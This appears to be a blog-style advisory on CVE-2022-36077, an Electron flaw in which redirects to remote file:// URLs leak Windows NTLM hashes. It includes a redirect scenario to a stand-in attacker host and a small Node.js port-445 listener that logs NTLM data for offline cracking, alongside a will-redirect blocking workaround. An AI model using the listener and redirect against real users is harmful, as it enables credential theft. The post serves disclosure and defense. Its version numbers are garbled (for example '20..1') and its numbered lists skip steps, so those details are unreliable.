Summary:
CVE-2022-36077 reveals a severe vulnerability in the Electron framework before versions 21..-beta.1, 20..1, 19..11, and 18.3.7. Electron, widely used for cross-platform desktop apps (think Visual Studio Code, Slack), uses web tech—JavaScript, HTML, CSS—to build native apps. This CVE lets attackers potentially grab sensitive Windows credentials by abusing special redirects, notably to SMB or file:// URLs.
In this post, you'll learn how the bug works, see code examples, and learn how to keep your apps safe.
What Exactly Happened?
When a webview or Electron's main window follows a link that redirects to a file:// URL, the app should stop it, because loading files from unknown places is risky. Electron was designed to block this. However…
If the destination is actually a remote file:// URL (for instance, file://some.website.com/), Windows treats it as a network share and tries to connect. That connection can send along your Windows NTLM hashes—the kind of stuff used to log into your machine—to the server at some.website.com. If the remote server is controlled by an attacker, they now have your login data, potentially exposing you to credential theft.
The contents of the file don’t show up to the app, but just by trying the connection, Electron is leaking sensitive info.
Scenario:
1. A user clicks a link (or is force-redirected) in an Electron app to a remote file:// URL.
Malicious Redirect: An attacker controls a webpage loaded in an Electron app.
2. The page redirects (via HTTP 302/307 or JavaScript window.location) to file://malicious.example.com/.
3. Windows receives the request, thinks it should look for a network share, and attempts NTLM authentication.
4. If CORS isn’t enforced and firewalls allow it, the attacker logs the auth request and harvests password hashes.
Code for an Exploit (Attacker’s Side)
// A fake Node.js server that listens for incoming SMB/NTLM auth attempts
const net = require('net');
const server = net.createServer((socket) => {
socket.on('data', (data) => {
console.log('Received NTLM data:', data.toString('hex'));
// Save data for offline password cracking
// In the real world, you would run responder, metasploit, impacket, etc.
socket.end();
});
});
server.listen(445, () => {
console.log('Listening for SMB connections on port 445...');
});
Note: To actually collect and crack NTLM hashes, attackers use specialized tools like Impacket or Responder. The above code is educational only.
How to Fix or Prevent the Issue
Official Fix:
Upgrade Electron to 21..-beta.1, 20..1, 19..11, or 18.3.7 (or newer).
Workaround if you CAN'T upgrade:
Stop your app from following dangerous redirects. Electron exposes an event called will-redirect. You can block suspicious redirects here:
const { app, BrowserWindow } = require('electron');
app.whenReady().then(() => {
const win = new BrowserWindow(/*...*/);
win.webContents.on('will-redirect', (event, url) => {
if (url.startsWith('file://')) {
event.preventDefault();
console.log('Blocked redirect to:', url);
}
});
});
Best Practice:
Block all redirects to file:// URLs, or even better, use allow-lists for URLs you explicitly trust.
Original References
- Electron Security Advisory - CVE-2022-36077
- Electron Changelog & Patch Notes
- GitHub Issue Tracker: NTLM Credential Leak
- More About NTLM Attacks
Why Should You Care?
Credential theft via NTLM is a real thing. Once an attacker has even *hashed* credentials, they can attempt offline cracking, relay attacks, or use them in lateral movement inside company networks. And this bug could let them grab your users’ credentials without warning.
Update Electron to a safe version!
2. Add extra protection: block all redirects to file:// in your Electron app's will-redirect events.
Check your firewall rules. Block outbound SMB traffic unless you truly need it!
5. Follow Electron’s Security Guidelines.
Stay safe and always keep your libraries updated!
*Content written exclusively for you. Share responsibly.*
Timeline
Published on: 11/08/2022 07:15:00 UTC
Last modified on: 11/09/2022 19:16:00 UTC